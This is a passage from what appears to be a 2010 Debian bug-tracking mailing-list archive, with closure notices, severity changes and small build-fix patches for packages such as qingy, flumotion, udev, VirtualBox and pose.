the file usr/share/info/dir.gz.

Nobody on d-devel disagreed to set the severity level to 'serious' if
packages in the archive are affected [0] and normal if they ae not. This
is the case on s390 [1].

[0] http://lists.debian.org/debian-devel/2010/09/msg00302.html
[1] http://packages.debian.org/sid/s390/qingy/filelist

Sebastian


---End Message---
---BeginMessage---
Source: qingy
Source-Version: 0.9.7-2

We believe that the bug you reported is fixed in the latest version of
qingy, which is due to be installed in the Debian FTP archive:

qingy_0.9.7-2.diff.gz
  to main/q/qingy/qingy_0.9.7-2.diff.gz
qingy_0.9.7-2.dsc
  to main/q/qingy/qingy_0.9.7-2.dsc
qingy_0.9.7-2_amd64.deb
  to main/q/qingy/qingy_0.9.7-2_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 597...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Riccardo Stagni unric...@email.it (supplier of updated qingy package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Format: 1.8
Date: Tue, 19 Oct 2010 01:02:35 +0200
Source: qingy
Binary: qingy
Architecture: source amd64
Version: 0.9.7-2
Distribution: unstable
Urgency: low
Maintainer: Riccardo Stagni unric...@email.it
Changed-By: Riccardo Stagni unric...@email.it
Description: 
 qingy  - framebuffer-enabled replacement for getty
Closes: 549943 579055 597410
Changes: 
 qingy (0.9.7-2) unstable; urgency=low
 .
   * Added dependency on dpkg | install-info as recommended by Policy
   * Removed unneeded /usr/share/info/dir.gz from built package
 (Closes: #597410, #579055)
   * Added build-dependency on xinit, so configure is able to find its
 path (Closes: #549943)
Checksums-Sha1: 
 e821d8cb62808a9569d128e46017e54d874764c5 1733 qingy_0.9.7-2.dsc
 5474e97b01a18ebf5f4a2e6c8d2ad2df96b4f6b6 15399 qingy_0.9.7-2.diff.gz
 cb676b10ed9f51f9c5a041dcf64634e6593263d9 331752 qingy_0.9.7-2_amd64.deb
Checksums-Sha256: 
 85e9a5b380e4f30dfbcd6708bec0fc039aa6382d999a31a10a4fa3b1e88c3ce4 1733 
qingy_0.9.7-2.dsc
 d3f6861b94d02c347b42019849b8a69883abee254313b96baa7699afddc94836 15399 
qingy_0.9.7-2.diff.gz
 3df1a66beb296a7a3b15df332eb3eb8afe63d6bc52977b87e4e5ae5f5f5b084c 331752 
qingy_0.9.7-2_amd64.deb
Files: 
 f0ed726f9e84ab42a182bce3d4eaf119 1733 admin optional qingy_0.9.7-2.dsc
 339c67bd6edb8fdde5bf48f227ca201e 15399 admin optional qingy_0.9.7-2.diff.gz
 43347e83a3ff441d62d104651b9159af 331752 admin optional qingy_0.9.7-2_amd64.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)

iQIcBAEBCAAGBQJMvUwoAAoJEB5qw/OH8O2sCYMP/0tIBqn3b/VwpfnrCLN1y0TI
NMvp4skniv8cRulnttnxHi95E4SD96U8iBHWuSSVn89r83nah5raQ0yWXIu7boVB
l/i6XrhJW73DMRE/ymzGOapUmBq5MaEbCi+mawN3NULYfaTnntDy7qJDMZDER/mF
tl3WBxXB2aLRXknfcGpJNIiMJq6SpQM9kD064bAMqSCS7Wcu51xT6C0GsfAG2+aI
WqW6x5T34s5yfvc42v0+XggVmk31UqO34NyMzTwFEWsDVqU+/p30OS6M3kW7lE4p
DSaYp0qy5V15rLGcXC23Wl+UqaBGUAh6jniXafwuFCuID9/IYVgh8xuctefHiVEF
Hem6a4xRWea46odJj5ZybDkCgWz0MxnX9kciiVDfxRfagHPeTyrY3lFBO7gBHXEK
DSQbOtvNFokHgliiOWVGBqwsHAwG+PAXLzX7T0JS0fuy304bTCPg4x6q3QDdcQri
WiwLQRtCgWiHo8Vbxq9Wq1gmN8v6fmaejtuNwVilprsHAqdeEHqc7ktTmdD+ocLb
V5wJX15t8RiVLHbkEfodc5vN8iG9OgV6GS9FgXKSl6LwYInueMRX3faixDADCWUM
NBsR8bqkKTbhmr9V2BK4c4XXusHpmqLBXITxroBGqA45G7gSX4eLlSHUOrgVj6Xq
MndBffM0wdoTQpY4hzv0
=yqaS
-END PGP SIGNATURE-


---End Message---


Bug#597410: marked as done (qingy: install-info installed leads to /usr/share/info/dir.gz in built package)

2010-10-19 Thread Debian Bug Tracking System
Your message dated Tue, 19 Oct 2010 08:33:17 +
with message-id e1p87df-0005mm...@franck.debian.org
and subject line Bug#579055: fixed in qingy 0.9.7-2
has caused the Debian Bug report #579055,
regarding qingy: install-info installed leads to /usr/share/info/dir.gz in 
built package
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
579055: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=579055
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: qingy
Version: 0.9.7-1
Severity: serious
Tags: squeeze, sid
User: debian-powerpc...@breakpoint.cc
Usertags: infodir

This package creates usr/share/info/dir during the build process if the
install-info package is installed. The built package will then contain
the file usr/share/info/dir.gz.

Nobody on d-devel disagreed to set the severity level to 'serious' if
packages in the archive are affected [0] and normal if they ae not. This
is the case on s390 [1].

[0] http://lists.debian.org/debian-devel/2010/09/msg00302.html
[1] http://packages.debian.org/sid/s390/qingy/filelist

Sebastian


---End Message---
---BeginMessage---
Source: qingy
Source-Version: 0.9.7-2

We believe that the bug you reported is fixed in the latest version of
qingy, which is due to be installed in the Debian FTP archive:

qingy_0.9.7-2.diff.gz
  to main/q/qingy/qingy_0.9.7-2.diff.gz
qingy_0.9.7-2.dsc
  to main/q/qingy/qingy_0.9.7-2.dsc
qingy_0.9.7-2_amd64.deb
  to main/q/qingy/qingy_0.9.7-2_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 579...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Riccardo Stagni unric...@email.it (supplier of updated qingy package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Format: 1.8
Date: Tue, 19 Oct 2010 01:02:35 +0200
Source: qingy
Binary: qingy
Architecture: source amd64
Version: 0.9.7-2
Distribution: unstable
Urgency: low
Maintainer: Riccardo Stagni unric...@email.it
Changed-By: Riccardo Stagni unric...@email.it
Description: 
 qingy  - framebuffer-enabled replacement for getty
Closes: 549943 579055 597410
Changes: 
 qingy (0.9.7-2) unstable; urgency=low
 .
   * Added dependency on dpkg | install-info as recommended by Policy
   * Removed unneeded /usr/share/info/dir.gz from built package
 (Closes: #597410, #579055)
   * Added build-dependency on xinit, so configure is able to find its
 path (Closes: #549943)
Checksums-Sha1: 
 e821d8cb62808a9569d128e46017e54d874764c5 1733 qingy_0.9.7-2.dsc
 5474e97b01a18ebf5f4a2e6c8d2ad2df96b4f6b6 15399 qingy_0.9.7-2.diff.gz
 cb676b10ed9f51f9c5a041dcf64634e6593263d9 331752 qingy_0.9.7-2_amd64.deb
Checksums-Sha256: 
 85e9a5b380e4f30dfbcd6708bec0fc039aa6382d999a31a10a4fa3b1e88c3ce4 1733 
qingy_0.9.7-2.dsc
 d3f6861b94d02c347b42019849b8a69883abee254313b96baa7699afddc94836 15399 
qingy_0.9.7-2.diff.gz
 3df1a66beb296a7a3b15df332eb3eb8afe63d6bc52977b87e4e5ae5f5f5b084c 331752 
qingy_0.9.7-2_amd64.deb
Files: 
 f0ed726f9e84ab42a182bce3d4eaf119 1733 admin optional qingy_0.9.7-2.dsc
 339c67bd6edb8fdde5bf48f227ca201e 15399 admin optional qingy_0.9.7-2.diff.gz
 43347e83a3ff441d62d104651b9159af 331752 admin optional qingy_0.9.7-2_amd64.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)

iQIcBAEBCAAGBQJMvUwoAAoJEB5qw/OH8O2sCYMP/0tIBqn3b/VwpfnrCLN1y0TI
NMvp4skniv8cRulnttnxHi95E4SD96U8iBHWuSSVn89r83nah5raQ0yWXIu7boVB
l/i6XrhJW73DMRE/ymzGOapUmBq5MaEbCi+mawN3NULYfaTnntDy7qJDMZDER/mF
tl3WBxXB2aLRXknfcGpJNIiMJq6SpQM9kD064bAMqSCS7Wcu51xT6C0GsfAG2+aI
WqW6x5T34s5yfvc42v0+XggVmk31UqO34NyMzTwFEWsDVqU+/p30OS6M3kW7lE4p
DSaYp0qy5V15rLGcXC23Wl+UqaBGUAh6jniXafwuFCuID9/IYVgh8xuctefHiVEF
Hem6a4xRWea46odJj5ZybDkCgWz0MxnX9kciiVDfxRfagHPeTyrY3lFBO7gBHXEK
DSQbOtvNFokHgliiOWVGBqwsHAwG+PAXLzX7T0JS0fuy304bTCPg4x6q3QDdcQri
WiwLQRtCgWiHo8Vbxq9Wq1gmN8v6fmaejtuNwVilprsHAqdeEHqc7ktTmdD+ocLb
V5wJX15t8RiVLHbkEfodc5vN8iG9OgV6GS9FgXKSl6LwYInueMRX3faixDADCWUM
NBsR8bqkKTbhmr9V2BK4c4XXusHpmqLBXITxroBGqA45G7gSX4eLlSHUOrgVj6Xq
MndBffM0wdoTQpY4hzv0
=yqaS
-END PGP SIGNATURE-


---End Message---


Bug#591118: monkeysphere: FTBFS: test failed

2010-10-19 Thread Alexander Reichle-Schmehl
Hi Jameson!

Am 18.10.2010 16:50, schrieb Jameson Rollins:
 On Mon, 18 Oct 2010 11:30:56 +0200, Alexander Reichle-Schmehl 
 toli...@debian.org wrote:
 I can reproduce this bug in about 3/4 of the build tests using
 monkeysphere 0.31-1 and a simple pbuilder with a minimal configuration:
 Hi, Alexander.  New versions of this package have been uploaded that
 claim to fix this issue, and the issue was subsequently closed.  Are you
 still having a problem with the new versions?

Looks promising.  I compiled it four times, and all four build attempts
succeeded.

Luckily I don't need the system I could reproduce the error for some
time, so I'll keep on letting it build monkeyspehere and report back in
a couple of hours.


Best regards,
  Alexander



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#600446: typo in /lib/udev/rules.d/70-acl.rules: closing double quote in last line missing

2010-10-19 Thread Marco d'Itri
severity 600446 important
thanks

On Oct 19, Alexander Kurtz kurtz.a...@googlemail.com wrote:

 mine (you were probably confused because he used Pseudo-headers). I'm
 therefore reopening and raising the severity since the missing quote
 actually seems to break things (see his mail).
Again: it's just a cosmetic issue.

-- 
ciao,
Marco


signature.asc
Description: Digital signature


Processed: Re: Bug#600446: typo in /lib/udev/rules.d/70-acl.rules: closing double quote in last line missing

2010-10-19 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 severity 600446 important
Bug #600446 [udev] Possible typo in /lib/udev/rules.d/70-acl.rules: closing 
double quote in last line missing
Severity set to 'important' from 'serious'

 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
600446: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=600446
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#573691: flumotion: NMU diff for 0.6.1-1.1 (Intent to NMU)

2010-10-19 Thread jari . aalto

Dear maintainer,

Here is the NMU diff according to DevRef 5.11.1[1][2] for bug: #573691.
See the debian/patches directory for the important fixes.

Please let me know if it is ok to proceed with NMU.

Thank you for maintaining the package,
Jari Aalto

[1] http://www.debian.org/doc/developers-reference/pkgs.html#nmu
[2] http://dep.debian.net/deps/dep1.html

lsdiff(1) of changes:

flumotion-0.6.1/debian/changelog
flumotion-0.6.1/debian/patches/20_configure_twisted.patch

diffstat for flumotion_0.6.1-1 flumotion_0.6.1-1.1

 debian/patches/20_configure_twisted.patch |   21 +
 flumotion-0.6.1/debian/changelog  |   10 ++
 2 files changed, 31 insertions(+)

diff -u flumotion-0.6.1/debian/changelog flumotion-0.6.1/debian/changelog
--- flumotion-0.6.1/debian/changelog
+++ flumotion-0.6.1/debian/changelog
@@ -1,3 +1,13 @@
+flumotion (0.6.1-1.1) unstable; urgency=low
+
+  * Non-maintainer upload.
+  * debian/patches
+- (20): New. fix configure file to detect correctly twisted  9.x.
+This fixes a FTBFS with twisted 10.x. Patch thanks to Ubuntu
+Fabrice coutade...@gmail.com (FTBFS; Closes: #573691).
+
+ -- Jari Aalto jari.aa...@cante.net  Sun, 17 Oct 2010 01:18:59 +0300
+
 flumotion (0.6.1-1) unstable; urgency=low
 
   [ Marc-André Lureau ]
only in patch2:
unchanged:
--- flumotion-0.6.1.orig/debian/patches/20_configure_twisted.patch
+++ flumotion-0.6.1/debian/patches/20_configure_twisted.patch
@@ -0,0 +1,21 @@
+Description: Fix configure script to accept twisted version greater than 9.
+  Patch inspired by what has been done by upstream in 0.6.2
+Author: Fabrice Coutadeur fabric...@ubuntu.com
+
+diff -Nur -x '*.orig' -x '*~' flumotion-0.6.1//configure flumotion-0.6.1.new//configure
+--- flumotion-0.6.1//configure	2009-09-09 11:37:51.0 +
 flumotion-0.6.1.new//configure	2010-08-21 07:38:08.815443393 +
+@@ -13322,9 +13322,10 @@
+ $as_echo_n checking for Twisted = 2.0.1...  6; }
+   prog=
+ import sys
+-import twisted.copyright
+-minver = '2.0.1'
+-if twisted.copyright.version  minver:
++from twisted import version as v
++minver = (2, 0, 1)
++curver = (v.major, v.minor, v.micro)
++if curver  minver:
+ sys.exit(1)
+ sys.exit(0)
+ 


Bug#573691: flumotion: NMU diff for 0.6.1-1.1 (Intent to NMU)

2010-10-19 Thread jari . aalto

Dear maintainer,

Here is the NMU diff according to DevRef 5.11.1[1][2] for bug: #573691.
See the debian/patches directory for the important fixes.

Please let me know it it's ok to proceed with NMU.

Thank you for maintaining the package,
Jari Aalto

[1] http://www.debian.org/doc/developers-reference/pkgs.html#nmu
[2] http://dep.debian.net/deps/dep1.html

lsdiff(1) of changes:

flumotion-0.6.1/debian/changelog
flumotion-0.6.1/debian/patches/20_configure_twisted.patch

diffstat for flumotion_0.6.1-1 flumotion_0.6.1-1.1

 debian/patches/20_configure_twisted.patch |   21 +
 flumotion-0.6.1/debian/changelog  |   10 ++
 2 files changed, 31 insertions(+)

diff -u flumotion-0.6.1/debian/changelog flumotion-0.6.1/debian/changelog
--- flumotion-0.6.1/debian/changelog
+++ flumotion-0.6.1/debian/changelog
@@ -1,3 +1,13 @@
+flumotion (0.6.1-1.1) unstable; urgency=low
+
+  * Non-maintainer upload.
+  * debian/patches
+- (Number 20): New. Fix configure file to detect correctly twisted 
+  9.x. This fixes a FTBFS with twisted 10.x. Patch thanks to Ubuntu
+  Fabrice coutade...@gmail.com (FTBFS; Closes: #573691).
+
+ -- Jari Aalto jari.aa...@cante.net  Tue, 19 Oct 2010 13:07:31 +0300
+
 flumotion (0.6.1-1) unstable; urgency=low
 
   [ Marc-André Lureau ]
only in patch2:
unchanged:
--- flumotion-0.6.1.orig/debian/patches/20_configure_twisted.patch
+++ flumotion-0.6.1/debian/patches/20_configure_twisted.patch
@@ -0,0 +1,21 @@
+Description: Fix configure script to accept twisted version greater than 9.
+  Patch inspired by what has been done by upstream in 0.6.2
+Author: Fabrice Coutadeur fabric...@ubuntu.com
+
+diff -Nur -x '*.orig' -x '*~' flumotion-0.6.1//configure flumotion-0.6.1.new//configure
+--- flumotion-0.6.1//configure	2009-09-09 11:37:51.0 +
 flumotion-0.6.1.new//configure	2010-08-21 07:38:08.815443393 +
+@@ -13322,9 +13322,10 @@
+ $as_echo_n checking for Twisted = 2.0.1...  6; }
+   prog=
+ import sys
+-import twisted.copyright
+-minver = '2.0.1'
+-if twisted.copyright.version  minver:
++from twisted import version as v
++minver = (2, 0, 1)
++curver = (v.major, v.minor, v.micro)
++if curver  minver:
+ sys.exit(1)
+ sys.exit(0)
+ 


Bug#600177: marked as done (virtualbox-ose: out of disk while merging a snapshot destroys the disk image)

2010-10-19 Thread Debian Bug Tracking System
Your message dated Tue, 19 Oct 2010 12:32:41 +0200
with message-id 20101019103241.ga28...@feivel.credativ.lan
and subject line Re: [Pkg-virtualbox-devel] Bug#600177: virtualbox-ose: out of 
disk while merging a snapshot destroys the disk image
has caused the Debian Bug report #600177,
regarding virtualbox-ose: out of disk while merging a snapshot destroys the 
disk image
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
600177: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=600177
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: virtualbox-ose
Version: 3.2.8-dfsg-2
Severity: grave
Justification: causes serious data loss

If you elect to merge the current state of a differentiating disk image into
the base (deleting a snapshot) and run out of disk space on the host
filesystem while merging, the resulting image will be corrupted.

I happened to look at the ~/.VirtualBox/VDI and
~/.VirtualBox/Machines/${machine}/Snapshot directories before trying to
continue, they did have both the base image and the differential one, so at
this point I guess it would be recoverable by simply restarting -- sectors
that were already overwritten by the new values would be overwritten with
the same data again.  However, when retrying the merge, VirtualBox started
merging a second disk (the virtual machine in question had two) and deleted
the first differential image.


-- System Information:
Debian Release: squeeze/sid
  APT prefers testing
  APT policy: (200, 'testing')
Architecture: i386 (i686)

Kernel: Linux 2.6.32-5-686 (SMP w/1 CPU core)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages virtualbox-ose depends on:
ii  adduser 3.112add and remove users and groups
ii  libc6   2.11.2-6 Embedded GNU C Library: Shared lib
ii  libcurl37.21.0-1 Multi-protocol file transfer libra
ii  libgcc1 1:4.4.5-2GCC support library
ii  libpng12-0  1.2.44-1 PNG library - runtime
ii  libpython2.62.6.6-3  Shared Python runtime library (ver
ii  libsdl1.2debian 1.2.14-6 Simple DirectMedia Layer
ii  libssl0.9.8 0.9.8o-2 SSL shared libraries
ii  libstdc++6  4.4.5-2  The GNU Standard C++ Library v3
ii  libvncserver0   0.9.7-2+b1   API to write one's own vnc server
ii  libx11-62:1.3.3-3X11 client-side library
ii  libxcursor1 1:1.1.10-2   X cursor management library
ii  libxext62:1.1.2-1X11 miscellaneous extension librar
ii  libxml2 2.7.7.dfsg-4 GNOME XML library
ii  libxmu6 2:1.0.5-2X11 miscellaneous utility library
ii  libxt6  1:1.0.7-1X11 toolkit intrinsics library
ii  python  2.6.6-3  interactive high-level object-orie
ii  python-central  0.6.16+nmu1  register and build utility for Pyt
ii  zlib1g  1:1.2.3.4.dfsg-3 compression library - runtime

Versions of packages virtualbox-ose recommends:
ii  libgl1-mesa-glx [libgl1]7.7.1-4  A free implementation of the OpenG
ii  libqt4-opengl   4:4.6.3-1+b1 Qt 4 OpenGL module
ii  libqtcore4  4:4.6.3-1+b1 Qt 4 core module
ii  libqtgui4   4:4.6.3-1+b1 Qt 4 GUI module
ii  virtualbox-ose-dkms 3.2.8-dfsg-2 x86 virtualization solution - kern
ii  virtualbox-ose-qt   3.2.8-dfsg-2 x86 virtualization solution - Qt b
ii  virtualbox-ose-source   3.2.8-dfsg-2 x86 virtualization solution - kern

Versions of packages virtualbox-ose suggests:
ii  libasound21.0.23-2   shared library for ALSA applicatio
ii  libpulse0 0.9.21-3   PulseAudio client libraries
pn  vde2  none (no description available)
ii  virtualbox-guest-additions3.2.8-1guest additions iso image for Virt

-- debconf information:
  virtualbox-ose/upstream_version_change: false


---End Message---
---BeginMessage---
On Fri, Oct 15, 2010 at 11:35:47PM +0200, Adam Borowski wrote:
 I tested a couple of scenarios, and indeed, 3.2.10 works just fine.

Thanks, closing the report then.

Michael
-- 
Michael Meskes
Michael at Fam-Meskes dot De, Michael at Meskes dot (De|Com|Net|Org)
Michael at BorussiaFan dot De, Meskes at (Debian|Postgresql) dot Org
Jabber: michael.meskes at googlemail dot com
VfL Borussia! Força Barça! Go SF 49ers! Use Debian 

Processed: found 600177 in 3.2.8-dfsg-2

2010-10-19 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 found 600177 3.2.8-dfsg-2
Bug #600177 {Done: Michael Meskes mes...@debian.org} [virtualbox-ose] 
virtualbox-ose: out of disk while merging a snapshot destroys the disk image
Did not alter found versions and reopened.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
600177: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=600177
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#501929: marked as done (pose: FTBFS with gcc 4.3: missing header includes)

2010-10-19 Thread Debian Bug Tracking System
Your message dated Tue, 19 Oct 2010 11:03:16 +
with message-id e1p89yo-lu...@franck.debian.org
and subject line Bug#600120: Removed package(s) from unstable
has caused the Debian Bug report #501929,
regarding pose: FTBFS with gcc 4.3: missing header includes
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
501929: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=501929
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: pose
Version: 3.5-9.1
Severity: important
Tags: patch
Justification: fails to build from source

Hi,

Compiling the pose package on a relatively up-to-date lenny, the following
types of errors pop up in various places:

../BuildUnix/../SrcUnix/EmDirRefUnix.cpp: In member function ‘void 
EmDirRef::GetChildren(EmFileRefList*, EmDirRefList*) const’:
../BuildUnix/../SrcUnix/EmDirRefUnix.cpp:325: error: ‘strcmp’ was not declared 
in this scope
../BuildUnix/../SrcUnix/EmDirRefUnix.cpp:328: error: ‘strcmp’ was not declared 
in this scope
../BuildUnix/../SrcUnix/EmDirRefUnix.cpp: In static member function ‘static 
EmDirRef EmDirRef::GetEmulatorDirectory()’:
../BuildUnix/../SrcUnix/EmDirRefUnix.cpp:458: error: ‘getenv’ was not declared 
in this scope
make[2]: *** [EmDirRefUnix.o] Error 1

The attached patch fixes this by adding the missing includes.

Cheers, Fabian

-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (800, 'testing'), (3, 'unstable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-1-686 (SMP w/1 CPU core)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages pose depends on:
ii  libc6  2.7-13GNU C Library: Shared libraries
ii  libfltk1.1 1.1.9-6   Fast Light Toolkit - shared librar
ii  libgcc11:4.3.1-9 GCC support library
ii  libstdc++6 4.3.1-9   The GNU Standard C++ Library v3
ii  libx11-6   2:1.1.5-1 X11 client-side library
ii  libxext6   2:1.0.4-1 X11 miscellaneous extension librar
ii  zlib1g 1:1.2.3.3.dfsg-12 compression library - runtime

pose recommends no packages.

Versions of packages pose suggests:
ii  pilot-link0.12.3-5   tools to communicate with a PalmOS
ii  pose-doc  3.5-9.1emulates the hardware for most Pal
pn  pose-profile  none (no description available)
pn  pose-skinsnone (no description available)

-- no debconf information
#! /bin/sh /usr/share/dpatch/dpatch-run
# vim: ft=diff
## 50_gcc43_includes.dpatch by Fabian Knittel fabian.knit...@avona.com
##
## All lines beginning with `## DP:' are a description of the patch.
## DP: fails to build from source with GCC 4.3 due to missing includes

@DPATCH@
diff -ur pose-3.5.orig/SrcShared/ChunkFile.cpp pose-3.5/SrcShared/ChunkFile.cpp
--- pose-3.5.orig/SrcShared/ChunkFile.cpp	2002-03-29 14:11:13.0 +0100
+++ pose-3.5/SrcShared/ChunkFile.cpp	2008-10-02 21:24:33.0 +0200
@@ -17,6 +17,8 @@
 #include Byteswapping.h		// Canonical
 #include Platform.h			// ReallocMemory
 
+#include string.h			// memmove, memcpy, strlen
+
 
 /***
  *
diff -ur pose-3.5.orig/SrcShared/EmException.cpp pose-3.5/SrcShared/EmException.cpp
--- pose-3.5.orig/SrcShared/EmException.cpp	2002-03-29 14:11:14.0 +0100
+++ pose-3.5/SrcShared/EmException.cpp	2008-10-02 21:25:23.0 +0200
@@ -21,6 +21,8 @@
 #include Platform.h			// Platform::GetString
 #include Strings.r.h			// kStr_InternalErrorException
 
+#include string.h			// strlen
+
 
 // ---
 //		¥ EmException::EmException
diff -ur pose-3.5.orig/SrcShared/EmPixMap.cpp pose-3.5/SrcShared/EmPixMap.cpp
--- pose-3.5.orig/SrcShared/EmPixMap.cpp	2002-03-29 14:11:14.0 +0100
+++ pose-3.5/SrcShared/EmPixMap.cpp	2008-10-02 21:27:19.0 +0200
@@ -16,6 +16,8 @@
 
 #include Platform.h			// Platform::AllocateMemory
 
+#include string.h			// memcpy, memset
+
 /*
 	EmPixMap is a simple class for managing pixmaps (multi-bpp bitmap)
 	in a cross-platform fashion.
diff -ur pose-3.5.orig/SrcShared/EmQuantizer.cpp pose-3.5/SrcShared/EmQuantizer.cpp
--- pose-3.5.orig/SrcShared/EmQuantizer.cpp	2002-03-29 14:11:14.0 +0100
+++ pose-3.5/SrcShared/EmQuantizer.cpp	2008-10-02 21:27:40.0 +0200
@@ -17,6 +17,8 @@
 #include EmPixMap.h
 #include Platform.h			// 

Bug#598884: marked as done (pose: FTBFS on armel: /bin/bash: ../../BuildUnix/depcomp: No such file or directory)

2010-10-19 Thread Debian Bug Tracking System
Your message dated Tue, 19 Oct 2010 11:03:16 +
with message-id e1p89yo-lu...@franck.debian.org
and subject line Bug#600120: Removed package(s) from unstable
has caused the Debian Bug report #598884,
regarding pose: FTBFS on armel: /bin/bash: ../../BuildUnix/depcomp: No such 
file or directory
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
598884: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=598884
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Source: pose
Version: 3.5-9.1
Severity: serious
Justification: FTBFS
User: debian-...@lists.debian.org
Usertags: eabi

Hi,

not exactly a regression, but since lenny/arm had a binary, it sounds
like it could be considered as such. Feel free to downgrade the severity
to important if you feel it's exaggerated. FTBFS on armel:
| source='../../BuildUnix/jpeg/../../SrcShared/jpeg/jcapimin.c' 
object='jcapimin.o' libtool=no \
|   depfile='.deps/jcapimin.Po' tmpdepfile='.deps/jcapimin.TPo' \
|   depmode=none /bin/bash ../../BuildUnix/depcomp \
|   arm-linux-gnueabi-gcc -DPACKAGE_NAME=\\ -DPACKAGE_TARNAME=\\ 
-DPACKAGE_VERSION=\\ -DPACKAGE_STRING=\\ -DPACKAGE_BUGREPORT=\\ 
-DHAVE_DIRENT_H=1 -DSTDC_HEADERS=1 -DHAVE_SYS_TYPES_H=1 -DHAVE_SYS_STAT_H=1 
-DHAVE_STDLIB_H=1 -DHAVE_STRING_H=1 -DHAVE_MEMORY_H=1 -DHAVE_STRINGS_H=1 
-DHAVE_INTTYPES_H=1 -DHAVE_STDINT_H=1 -DHAVE_UNISTD_H=1 -DHAVE_ENDIAN_H=1 
-DHAVE_FCNTL_H=1 -DHAVE_LIMITS_H=1 -DHAVE_STRINGS_H=1 -DHAVE_SYS_TIME_H=1 
-DHAVE_UNISTD_H=1 -DHAVE_TYPE_SOCKLEN_T=1 -DHAVE_ALLOCA_H=1 -DHAVE_ALLOCA=1 
-DHAVE_MKDIR=1 -DHAVE_MKSTEMP=1 -DHAVE_TEMPNAM=1 -DHAVE_LIBFLTK=1  -I. 
-I../../BuildUnix/jpeg -I../../BuildUnix/jpeg/../../SrcShared/jpeg 
-I../../BuildUnix/jpeg/../../SrcUnix-DPLATFORM_UNIX=1 -D__PALMOS_TRAPS__=0 
-DEMULATION_LEVEL=EMULATION_UNIX -O2  -DHAS_PROFILING=0 -DNDEBUG  -fexceptions 
-Wall -Wno-multichar -Wno-unknown-pragmas -Wno-conversion   -c `test -f 
'../../BuildUnix/jpeg/../../SrcShared/jpeg/jcapimin.c' || echo 
'../../BuildUnix/jpeg/'`../../BuildUnix/jpeg/../
 ../SrcShared/jpeg/jcapimin.c
| /bin/bash: ../../BuildUnix/depcomp: No such file or directory
| make[2]: *** [jcapimin.o] Error 127

Full build logs:
  https://buildd.debian.org/status/package.php?p=pose

Mraw,
KiBi.


---End Message---
---BeginMessage---
Version: 3.5-9.1+rm

Dear submitter,

as the package pose has just been removed from the Debian archive
unstable we hereby close the assiciated bug reports.  We are sorry
that we couldn't deal with your issue properly.

For details on the removal, please see http://bugs.debian.org/600120

This message was generated automatically; if you believe that there is
a problem with it please contact the archive administrators by mailing
ftpmas...@debian.org.

Debian distribution maintenance software
pp.
Alexander Reichle-Schmehl (the ftpmaster behind the curtain)

---End Message---


Bug#597375: bsc: canceling move-operation removes source folder

2010-10-19 Thread Julien Cristau
On Mon, Sep 20, 2010 at 23:07:26 +0200, Christoph Haas wrote:

